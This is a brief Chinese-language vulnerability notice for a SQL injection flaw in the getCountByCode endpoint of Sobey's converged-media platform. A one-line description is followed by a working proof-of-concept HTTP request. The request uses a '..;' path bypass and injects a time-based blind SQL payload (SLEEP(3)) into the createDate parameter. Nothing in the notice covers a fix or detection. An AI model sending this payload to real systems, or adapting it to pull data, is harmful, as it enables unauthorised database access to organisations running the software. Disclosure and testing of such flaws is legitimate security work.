漏洞描述
索贝融媒体getCountByCode存在SQL注入漏洞,攻击者就能将恶意 SQL语句插入到原本预定的查询语句中,执行不该执行的数据库操作。
索贝融媒体getCountByCode存在SQL注入漏洞
PoC代码
GET /sobey-mchEditor/js/..;/count/getCountByCode?createDate=1%27+AND+%28SELECT+6067+FROM+%28SELECT%28SLEEP%283%29%29%29ZuGP%29+AND+%27SlgF%27%3D%27SlgF&orderType=1&status=1&userCode=1&siteCode=1&token=1 HTTP/1.1
Host:
Accept-Encoding: gzip
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.93 Safari/537.36